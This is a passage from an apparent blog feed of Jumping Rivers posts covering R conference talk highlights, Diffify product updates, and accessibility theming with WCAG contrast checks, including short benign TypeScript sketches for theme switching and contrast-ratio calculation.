&lt;p&gt;In this talk, Tan showed us how to transform R scripts into projects that can live forever. He talked about converting scripts to R packages, and using some powerful features of GitHub (including GitHub Actions and GitHub Releases) to make your projects useful even after you&amp;rsquo;ve stopped developing them. Tan&amp;rsquo;s talk materials are available on &lt;a href="https://github.com/tanho63/project_immortality_with_github/" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="liz-roten"&gt;&lt;a href="https://twitter.com/LizRoten" rel="external"&gt;Liz Roten&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Oddly Satisfying - Find delight in the mundane&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Many of us have inherited projects with promises that the code will &lt;em&gt;just work&lt;/em&gt; - and then it doesn&amp;rsquo;t. Liz talked about how you tackle the problem of messy projects, including using thoughtful documentation to make the job a little easier for the next person to inherit it. Liz&amp;rsquo;s talk materials can be found on her &lt;a href="https://www.lizroten.com/oddly/" rel="external"&gt;website&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="tyler-morgan-wall"&gt;&lt;a href="https://twitter.com/tylermorganwall" rel="external"&gt;Tyler Morgan-Wall&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Building a ggplot2 rollercoaster: Creating amazing 3D data visualizations in R&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I think 3D plots are often unfairly maligned, and Tyler&amp;rsquo;s talk on how to build 3D visualisations in R showed just how informative and engaging they can be when you do them well. He also introduced the {rayrollercoaster} package for building 3D rollercoasters in R, which is one of the coolest things I&amp;rsquo;ve seen in a while.&lt;/p&gt;
&lt;h2 id="jumping-rivers-talks"&gt;Jumping Rivers Talks&lt;/h2&gt;
&lt;p&gt;As well as attending talks and chatting to conference attendees, we gave a couple of talks of our own.&lt;/p&gt;
&lt;h3 id="comparing-package-versions-with-diffify"&gt;Comparing package versions with Diffify&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://twitter.com/csgillespie" rel="external"&gt;Colin&lt;/a&gt;&amp;rsquo;s lightning talk on &lt;a href="https://diffify.com/" rel="external"&gt;diffify.com&lt;/a&gt; showed how to easily compare versions of R packages, and highlighted changes in {lubridate} as an example. Colin&amp;rsquo;s slides can be found on &lt;a href="https://github.com/rstudio/rstudio-conf/tree/master/2022/colingillespie" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p style="width: 50%; margin: auto;"&gt;
&lt;img src="colin.png?raw=true" alt="Screenshot of diffify website showing search bar and menu"&gt;
&lt;/p&gt;
&lt;h3 id="say-hello-to-multilingual-shiny-apps"&gt;Say Hello! to Multilingual Shiny Apps&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://twitter.com/nrennie35" rel="external"&gt;Nicola&lt;/a&gt; gave a lightning talk on building multilingual Shiny apps where she talked about why it&amp;rsquo;s important, and how bar charts can suddenly become not so simple when you need to output them in multiple languages. Nicola&amp;rsquo;s slides can also be found on &lt;a href="https://github.com/rstudio/rstudio-conf/tree/master/2022/nicolarennie" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p style="width: 50%; margin: auto;"&gt;
&lt;img src="nicola.png?raw=true" alt="Presentation slide with image of a dropdown menu showing four choices of language"&gt;
&lt;/p&gt;
&lt;h2 id="whats-next"&gt;What&amp;rsquo;s Next?&lt;/h2&gt;
&lt;p&gt;If you came to talk to us at the conference, you might have noticed we were running a competition to win 6 hours of free training. We&amp;rsquo;ll send an email to our winner shortly, so keep your eyes peeled - the winner could be you! If you didn&amp;rsquo;t get the chance to talk to us at the conference, you can reach out to us on &lt;a href="https://www.linkedin.com/company/jumping-rivers-ltd" rel="external"&gt;LinkedIn&lt;/a&gt;, &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;Twitter&lt;/a&gt;, or through our &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Recordings for talks will be available online in a few weeks, but if that&amp;rsquo;s not enough, you can already sign up for next year! The first ever posit::conf(2023) will take place in Chicago, Illinois on September 17 - 20, 2023. &lt;a href="https://na.eventscloud.com/ereg/index.php?eventid=705462" rel="external"&gt;Early bird registration&lt;/a&gt; is open now!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/highlights-rstudioconf2022/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Diffify - 3 months on</title><link>https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/</link><pubDate>Tue, 09 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/diffify_logo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re now three months on from the initial release of Diffify, and what a few months it&amp;rsquo;s been! We thought now seemed like a good time to give you an overview of the big updates that Diffify has been through since its launch.&lt;/p&gt;
&lt;h3 id="recognition-and-user-feedback"&gt;Recognition and user feedback&lt;/h3&gt;
&lt;p&gt;We are delighted to see that our app has been quickly adopted by the R community:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://rweekly.org/" rel="external"&gt;R Weekly&lt;/a&gt; now displays links to Diffify for updated CRAN packages!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Our very own &lt;a href="https://twitter.com/csgillespie" rel="external"&gt;Colin Gillespie&lt;/a&gt; has just presented &lt;a href="https://sched.co/11ia3" rel="external"&gt;a talk&lt;/a&gt; on Diffify at the recent &lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;RStudio Conference&lt;/a&gt;!&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Lots of positive feedback on &lt;a href="https://www.linkedin.com/company/jumping-rivers-ltd/" rel="external"&gt;LinkedIn&lt;/a&gt; and &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;Twitter&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Our users have also been making some really helpful suggestions on our &lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;GitHub&lt;/a&gt;, inspiring some of the updates listed below!&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-diffify-3-month-update"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="updates-since-launch"&gt;Updates since launch&lt;/h3&gt;
&lt;p&gt;Diffify has had a lot of updates since launch, but here are a few of the biggest ones for end users:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In response to a comment from one of our users, we have added an option to diff against an &amp;ldquo;empty package&amp;rdquo; (e.g., &lt;a href="https://diffify.com/R/rmarkdown/empty/2.14" rel="external"&gt;https://diffify.com/R/rmarkdown/empty/2.14&lt;/a&gt;). This enables the user to view &lt;strong&gt;all&lt;/strong&gt; dependencies, exports and functions for a given version. It also means we avoid a blank webpage for packages that only have one version!&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="empty package" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/empty_screenshot.png" width="1557"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;To increase the accessibility of the website, we&amp;rsquo;ve&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Improved the default text contrast and colours&lt;/li&gt;
&lt;li&gt;Added an option to select a theme, including a dichromat-friendly colour theme and boosted-contrast theme (the latter is set as the default theme if the user prefers it)&lt;/li&gt;
&lt;li&gt;Made the app fully accessible via keyboard navigation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you&amp;rsquo;re interested in learning more, check out the &lt;a href="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/" rel="external"&gt;recent blog series&lt;/a&gt; by our frontend developer Tim!&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="colour theme" height="auto" id="h-rh-i-1" src="https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/theme_screenshot.png" width="1569"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The app now looks great on mobile and narrow screens:
&lt;ul&gt;
&lt;li&gt;The left-hand navigation shrinks to a side-bar&lt;/li&gt;
&lt;li&gt;We&amp;rsquo;ve fixed some visual bugs&lt;/li&gt;
&lt;li&gt;Long entries are now scrollable&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img alt="mobile screenshot" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/mobile_screenshot.png" width="1487"&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;We&amp;rsquo;ve made some improvements to readability:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In the Namespace section, export type is now labelled to the right of each entry&lt;/li&gt;
&lt;li&gt;In response to a comment on Twitter, we have reduced the whitespace between sections&lt;/li&gt;
&lt;li&gt;In the Functions section, the &amp;ldquo;Arguments&amp;rdquo; dropdown is now replaced with a &amp;ldquo;No arguments&amp;rdquo; label if a function does not have any arguments&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;We&amp;rsquo;ve fixed a number of bugs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The app is now consistent across different browsers&lt;/li&gt;
&lt;li&gt;We&amp;rsquo;ve fixed various visual bugs (like NEWS text overlapping with borders)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;We&amp;rsquo;ve made some optimisations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The app is more responsive (e.g., &amp;ldquo;last updated&amp;rdquo; tooltip appears instantly)&lt;/li&gt;
&lt;li&gt;Package dropdown suggestions now match from the start of the package name&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="looking-ahead"&gt;Looking ahead&lt;/h3&gt;
&lt;p&gt;We have just completed a huge restructure of our backend code. While this is invisible to our users, it will make it &lt;strong&gt;much&lt;/strong&gt; easier for us to add new languages and package repositories (e.g., bioconductor) in the future!&lt;/p&gt;
&lt;p&gt;With that in mind, we are actively expanding Diffify to include Python packages. Stay tuned&amp;hellip;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/diffify-3-months-r-cran/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Theming diffify for accessibility: Part 2</title><link>https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/</link><pubDate>Thu, 04 Aug 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our two part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/" rel="external"&gt;Theming diffify for accessibility: Part 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Theming diffify for accessibility: Part 2 (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In Part 1 of this two-post blog series I covered contrast sensitivity and colour vision deficiencies and related terminology. Here, in Part 2, I&amp;rsquo;ll cover the changes we made to &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt; and take a quick look at some tools we used to help us.&lt;/p&gt;
&lt;h2 id="theming"&gt;Theming&lt;/h2&gt;
&lt;p&gt;It&amp;rsquo;s difficult to design a website that is &amp;ldquo;just right&amp;rdquo; for everyone. For instance, while reds and greens can be difficult to discern for some dichromats and anomalous trichromats, most trichromats have no such problem (peak daylight sensitivity lies in the yellow part of the spectrum, between red and green). Moreover, these colours also have common cultural semantics (though these do, of course, vary by culture). We also care about aesthetics.&lt;/p&gt;
&lt;p&gt;Because of this conflict and more besides, we decided the best approach to making the site more accessible was through &amp;ldquo;theming&amp;rdquo;. To quote &lt;a href="https://en.wikipedia.org/wiki/Theme_(computing)" rel="external"&gt;Wikipedia&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In computing, a theme is a preset package containing graphical appearance and functionality details. A theme usually comprises a set of shapes and colors for the graphical control elements, the window decoration and the window. Themes are used to customize the look and feel of a piece of computer software or of an operating system.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We felt this offered a best-of-both-worlds approach - the site can remain aesthetically pleasing for our regular users (we hope) while offering a more accessible experience to those with visual impairments. Theming also makes things extensible - we can add more themes with time (e.g. dark mode, perhaps?).&lt;/p&gt;
&lt;p&gt;For a site of the modest size of &lt;a href="https://diffify.com" rel="external"&gt;diffify&lt;/a&gt; this meant the addition of a dropdown menu from which the user can select a theme (see below), a few lines of JavaScript to update the theme when the user changes their selection from the menu and some &lt;a href="https://en.wikipedia.org/wiki/CSS" rel="external"&gt;CSS rules&lt;/a&gt; for each theme. (We actually use &lt;a href="https://en.wikipedia.org/wiki/Sass_(stylesheet_language)" rel="external"&gt;Sass&lt;/a&gt;, which helps keep the code &lt;a href="https://en.wikipedia.org/wiki/Don%27t_repeat_yourself" rel="external"&gt;DRY&lt;/a&gt;, but the resulting output is still CSS.)&lt;/p&gt;
&lt;img src="images/dropdown.png" srcset="images/dropdown@2x.png 2x" style="width: 307px; display: block; margin-left: auto; margin-right: auto" alt="A screenshot of the new theme-selection dropdown menu." /&gt;
&lt;p&gt;Through this approach, maintaining a theme means updating CSS rules, while adding a theme means adding CSS rules and an extra option in the dropdown menu. There is no real requirement on a maintainer to be a JavaScript expert.&lt;/p&gt;
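&lt;p&gt;To make the division of labour concrete, here is a minimal TypeScript sketch of the kind of glue code involved. It is not the code that runs on diffify: the theme identifiers, the &lt;code&gt;data-theme&lt;/code&gt; attribute and the function names are all assumptions made for illustration. The element is passed in as a parameter so the sketch can run outside a browser.&lt;/p&gt;

```typescript
// Hypothetical theme identifiers; the real names used by diffify are not given in this post.
type Theme = "default" | "boosted-contrast" | "dichromat-friendly";

// Minimal shape of the element we write to, so the sketch also runs outside a browser.
interface ThemeTarget {
  setAttribute(name: string, value: string): void;
}

const THEMES: readonly Theme[] = ["default", "boosted-contrast", "dichromat-friendly"];

// Narrow an arbitrary dropdown value to a known theme, falling back to the default.
function parseTheme(value: string): Theme {
  const match = THEMES.find((theme) => theme === value);
  return match ?? "default";
}

// Record the chosen theme on the root element. CSS rules keyed on the
// (assumed) attribute, e.g. [data-theme="boosted-contrast"], do the rest.
function applyTheme(root: ThemeTarget, value: string): Theme {
  const theme = parseTheme(value);
  root.setAttribute("data-theme", theme);
  return theme;
}
```

&lt;p&gt;In a browser, a change listener on the dropdown could call &lt;code&gt;applyTheme(document.documentElement, select.value)&lt;/code&gt;. Adding a theme would then mean one more entry in the list plus the matching CSS rules.&lt;/p&gt;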
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-theming-diffify-for-accessibility-2"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="our-themes"&gt;Our themes&lt;/h2&gt;
&lt;p&gt;At the time of writing we have three themes for the user to choose from.&lt;/p&gt;
&lt;h3 id="default"&gt;Default&lt;/h3&gt;
&lt;p&gt;As the name suggests, this is the theme you will probably see when you first come to the site in a particular browser. While this theme should work for most users, a few of the text elements have lower contrast than required to meet the WCAG AA standard (see below) and as we showed in Part 1, some people with colour vision deficiencies might struggle to discern the different types of entries by colour alone.&lt;/p&gt;
&lt;h3 id="boosted-contrast"&gt;Boosted contrast&lt;/h3&gt;
&lt;p&gt;As the name suggests, the Boosted contrast theme increases the contrast between the text and the background that it sits on (when compared to the Default theme) to meet the &lt;a href="https://www.w3.org/TR/WCAG21/#contrast-minimum" rel="external"&gt;WCAG 2.1 Level AA standard&lt;/a&gt;. This includes changing the font and background colours of the buttons and entries in the various sections and also the colour of tab links and the body text itself. We hope this theme makes using diffify a nice experience for those with impaired contrast sensitivity.&lt;/p&gt;
&lt;img src="images/suggests-boosted-contrast.png" srcset="images/suggests-boosted-contrast@2x.png 2x" alt="A screenshot of part of a diffify page with the Boosted contrast theme applied." /&gt;
&lt;p&gt;While the Default theme will be the theme that shows up for most visitors the first time they arrive at the site, for a few it will be this theme. We now check whether the user has specified a preference for higher contrast and, if so, default to this theme. (For the technically minded, this preference information is available through the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/CSS/@media/prefers-contrast" rel="external"&gt;&amp;ldquo;prefers-contrast&amp;rdquo;&lt;/a&gt; CSS media query or via the &lt;a href="https://developer.mozilla.org/en-US/docs/Web/API/Window/matchMedia" rel="external"&gt;matchMedia&lt;/a&gt; JavaScript interface.)&lt;/p&gt;
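&lt;p&gt;A minimal sketch of that check in TypeScript might look like the following. The function and theme names are assumptions for illustration rather than the code used on diffify, and the &lt;code&gt;matchMedia&lt;/code&gt; function is passed in as a parameter so the logic can be exercised without a browser.&lt;/p&gt;

```typescript
// Minimal shape of what window.matchMedia returns; only `matches` is needed here.
interface MediaQueryResult {
  matches: boolean;
}

type MatchMedia = (query: string) => MediaQueryResult;

// Pick the theme for a first-time visitor. The theme names are hypothetical.
function initialTheme(matchMedia: MatchMedia): string {
  // "more" is the prefers-contrast value for users who have asked for higher contrast.
  const prefersMore = matchMedia("(prefers-contrast: more)").matches;
  return prefersMore ? "boosted-contrast" : "default";
}
```

&lt;p&gt;In a browser this could be called as &lt;code&gt;initialTheme((query) =&amp;gt; window.matchMedia(query))&lt;/code&gt;, with a stored user choice, if there is one, taking priority over the result.&lt;/p&gt;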
&lt;h3 id="dichromat-friendly"&gt;Dichromat friendly&lt;/h3&gt;
&lt;p&gt;This is our new theme that we hope makes for a nicer experience for users with dichromacy and anomalous trichromacy. The colours used for &amp;ldquo;Added&amp;rdquo;, &amp;ldquo;Removed&amp;rdquo; and &amp;ldquo;Changed&amp;rdquo; buttons and entries should be mutually distinguishable for protanopes, deuteranopes and tritanopes (and their anomalous trichromat counterparts). They are modified versions of the &amp;ldquo;3-class Dark 2&amp;rdquo; palette from &lt;a href="https://colorbrewer2.org/#type=qualitative&amp;scheme=Dark2&amp;n=3" rel="external"&gt;Colorbrewer 2.0&lt;/a&gt;, with decreased transparency to make the black text clearer.&lt;/p&gt;
&lt;p&gt;The image below shows a screenshot of this theme. The bottom-left half of the screenshot has had a deuteranopia filter applied to it using the &amp;ldquo;Sim Daltonism&amp;rdquo; application (see below). The simulation implies that the three types of entries (Added, Removed, Changed) should be distinguishable by colour alone to both trichromats and dichromats with deuteranopia. We also used Sim Daltonism to check the appearance of the app with the other dichromat and anomalous trichromat impairments described in Part 1.&lt;/p&gt;
&lt;img src="images/dichromat-deut.png" srcset="images/dichromat-deut@2x.png 2x" alt="A screenshot of a section from diffify using the dichromat theme. The top-left half of the image assumes normal vision. The bottom-left half of the image applies a deuternopia filter using the Sim Daltonism software." /&gt;
&lt;h2 id="testing-themes"&gt;Testing themes&lt;/h2&gt;
&lt;p&gt;This section looks at tools used to test our themes. It is largely aimed at website developers and some familiarity with &lt;a href="https://developer.chrome.com/docs/devtools/" rel="external"&gt;Chrome DevTools&lt;/a&gt; may be helpful.&lt;/p&gt;
&lt;h3 id="looking-for-low-contrast-text"&gt;Looking for low-contrast text&lt;/h3&gt;
&lt;p&gt;To find any text of insufficient contrast we used Chrome DevTools and a built in application called &lt;a href="https://github.com/GoogleChrome/lighthouse" rel="external"&gt;Lighthouse&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Lighthouse analyzes web apps and web pages, collecting modern performance metrics and insights on developer best practices.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;To use Lighthouse to look for low-contrast text you need to open the DevTools, select the Lighthouse tab and make sure the &amp;ldquo;Accessibility&amp;rdquo; option is checked before clicking &amp;ldquo;Analyze page load&amp;rdquo; (&amp;ldquo;Generate report&amp;rdquo; in older versions of Chrome). The WCAG AA requirements for contrast ratio change with text size so if your text changes size going from large to small screens you may want to generate a report for both Device settings. (The &amp;ldquo;Mode&amp;rdquo; setting is new, but the default &amp;ldquo;Navigation&amp;rdquo; setting matches the behaviour in older versions of the app.)&lt;/p&gt;
&lt;img src="images/generate-report.png" srcset="images/generate-report@2x.png 2x" alt="A screenshot of the 'Lighthouse' tab in Chrome DevTools." /&gt;
&lt;p&gt;If there is any visible text on the page (at load time) that lacks sufficient contrast, the Lighthouse report will flag that &amp;ldquo;Background and foreground colors do not have a sufficient contrast ratio&amp;rdquo;, along with any of the other automatable accessibility test failures it has found (e.g. images lacking alt text). Open the disclosure triangle to see which elements are problematic.&lt;/p&gt;
&lt;img src="images/low-contrast-text.png" srcset="images/low-contrast-text@2x.png 2x" alt="A screenshot of a Lighthouse report that shows that link text does not have sufficient contrast." /&gt;
&lt;h3 id="testing-the-high-contrast-preference"&gt;Testing the high-contrast preference&lt;/h3&gt;
&lt;p&gt;As mentioned above, &lt;a href="https://diffify.com" rel="external"&gt;diffify&lt;/a&gt; will check whether first-time visitors to the site have a preference for high contrast and set the initial theme accordingly. A user may specify their preference through their operating system, so a developer can too. But Chrome DevTools also allow developers to override this value (and those of other CSS media features) on a temporary basis through a &lt;a href="https://developer.chrome.com/docs/devtools/rendering/emulate-css/#emulate-css-media-feature-prefers-contrast" rel="external"&gt;dropdown setting found in the Rendering tab&lt;/a&gt;.&lt;/p&gt;
&lt;img src="images/prefers-contrast.png" srcset="images/prefers-contrast@2x.png 2x" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="A screenshot of part of the Chrome DevTools Rendering tab, showing the 'Emulate CSS meadia-feature prefers contrast' dropdown menu" /&gt;
&lt;h3 id="simulating-colour-vision-deficiencies"&gt;Simulating Colour Vision Deficiencies&lt;/h3&gt;
&lt;h4 id="sim-daltonism"&gt;Sim Daltonism&lt;/h4&gt;
&lt;p&gt;Sim Daltonism is an app that is available for MacOS and iOS. Both versions let the user choose a colour vision deficiency and present a simulation to them. On an iOS device the source &amp;lsquo;image&amp;rsquo; is the live feed from either a front or rear facing camera: if you&amp;rsquo;re a trichromat you can use it to see the &amp;lsquo;real world&amp;rsquo; through the eyes of a dichromat. The MacOS version presents a rectangular box on the screen that can be moved and resized. Within the box, the simulation is applied to the content that lies beneath it, as shown in the image below. Using this we could quickly test how our themes would look to users with any of the colour vision conditions described in Part 1.&lt;/p&gt;
&lt;img src="images/sim-daltonism.png" srcset="images/sim-daltonism@2x.png 2x" alt="A screenshot of part of a page of diffify with the Sim Daltonism window overlaid over much of it and the 'Protanopia' simulation applied." /&gt;
&lt;h4 id="chrome-devtools"&gt;Chrome DevTools&lt;/h4&gt;
&lt;p&gt;I also used the &amp;ldquo;Emulate vision deficiencies&amp;rdquo; option built in to recent versions of Google Chrome&amp;rsquo;s DevTools. Because it&amp;rsquo;s built into Chrome, you can use it on Windows or Linux, as well as Mac. Currently the simulations available are protanopia, deuteranopia, and tritanopia plus achromatopsia (a form of monochromatism) and blurred vision. Like the Emulate CSS media features described above, this can be found in the Rendering tab. Addy Osmani, a senior engineer at Google, has written a &lt;a href="https://addyosmani.com/blog/emulate-vision-deficiencies-devtools/" rel="external"&gt;helpful blog post explaining everything&lt;/a&gt;.&lt;/p&gt;
&lt;img src="images/emulate-vision-deficiencies.png" srcset="images/emulate-vision-deficiencies@2x.png 2x" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="A screenshot of part of the Chrome DevTools Rendering tab, showing the 'Emulate vision deficiencies' dropdown menu" /&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Theming diffify for accessibility: Part 1</title><link>https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/</link><pubDate>Thu, 28 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1//header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our two part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: Theming diffify for accessibility: Part 1 (this post)&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/theming-diffify-accessibility-2/" rel="external"&gt;Theming diffify for accessibility: Part 2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For most web developers the switch from desktop or laptop to mobile device will be something they do most days. We know what a designed-only-for-desktop experience feels like on a mobile device and it isn&amp;rsquo;t great. But accessibility on the web isn&amp;rsquo;t &lt;em&gt;just&lt;/em&gt; about checking that your website is largely agnostic to the physical size of your users&amp;rsquo; screens, it&amp;rsquo;s also about making your content available to those users who have physiological impairments. For those of us fortunate enough to have close-to-normal vision (perhaps after correction) and good fine-motor-control it&amp;rsquo;s easy to forget that others do not.&lt;/p&gt;
&lt;p&gt;In this blog post and a follow up I&amp;rsquo;m going to describe why and how we used theming to make &lt;a href="https://diffify.com" rel="external"&gt;diffify.com&lt;/a&gt; more accessible to users who suffer from some common visual impairments. Here in Part 1 I&amp;rsquo;ll cover some of the science and the terminology. Part 2 will look at the actual changes we made.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-theming-diffify-for-accessibility-1"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="impaired-contrast-sensitivity"&gt;Impaired contrast sensitivity&lt;/h2&gt;
&lt;p&gt;Contrast sensitivity is a measure of our ability to distinguish between foreground and background objects of differing &lt;a href="https://en.wikipedia.org/wiki/Luminance" rel="external"&gt;luminance&lt;/a&gt;. Correspondingly, people with low/impaired contrast sensitivity may struggle when the difference in luminance between foreground and background objects is small. In our particular case we&amp;rsquo;re talking about foreground text on a solid-colour background.&lt;/p&gt;
&lt;p&gt;Impaired contrast sensitivity is associated with a number of physiological conditions. Some of these seemed obvious to me - cataracts, glaucoma, macular degeneration. Others less so - diabetes, &lt;a href="https://ncbi.nlm.nih.gov/pmc/articles/PMC5222688/" rel="external"&gt;Parkinson&amp;rsquo;s disease&lt;/a&gt;. Moreover, as highlighted by &lt;a href="https://mrfirthy.me/" rel="external"&gt;Ashley Firth&lt;/a&gt; (in Chapter 3 of his excellent book &lt;a href="https://inclusive.guide/" rel="external"&gt;&amp;ldquo;Practical Web Inclusion and Accessibility&amp;rdquo;&lt;/a&gt;), low-contrast text can also be a struggle for those experiencing a temporary condition such as a migraine or, simply, tiredness.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://www.w3.org/TR/WCAG21/" rel="external"&gt;Web Content Accessibility Guidelines (WCAG)&lt;/a&gt; set out some compliance standards for contrast levels (and much much more besides). We wanted to ensure we offered an option that meets their &lt;a href="https://www.w3.org/TR/WCAG21/#x1-4-3-contrast-minimum" rel="external"&gt;AA standard&lt;/a&gt; for text.&lt;/p&gt;
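&lt;p&gt;For readers who want to see what the AA contrast requirement means in numbers, here is a small TypeScript sketch of the WCAG 2.1 contrast-ratio calculation. The function names are my own, and this is an illustration of the published formula rather than code taken from diffify. Level AA asks for a ratio of at least 4.5:1 for normal-size text and 3:1 for large text.&lt;/p&gt;

```typescript
// 8-bit sRGB channels, each from 0 to 255.
type Rgb = [number, number, number];

// Linearise one sRGB channel as defined for WCAG 2.1 relative luminance.
function lineariseChannel(value: number): number {
  const c = value / 255;
  return c > 0.03928 ? Math.pow((c + 0.055) / 1.055, 2.4) : c / 12.92;
}

// Relative luminance: a weighted sum of the linearised red, green and blue channels.
function relativeLuminance([r, g, b]: Rgb): number {
  return (
    0.2126 * lineariseChannel(r) +
    0.7152 * lineariseChannel(g) +
    0.0722 * lineariseChannel(b)
  );
}

// Contrast ratio runs from 1 (identical colours) to 21 (black on white).
function contrastRatio(a: Rgb, b: Rgb): number {
  const la = relativeLuminance(a);
  const lb = relativeLuminance(b);
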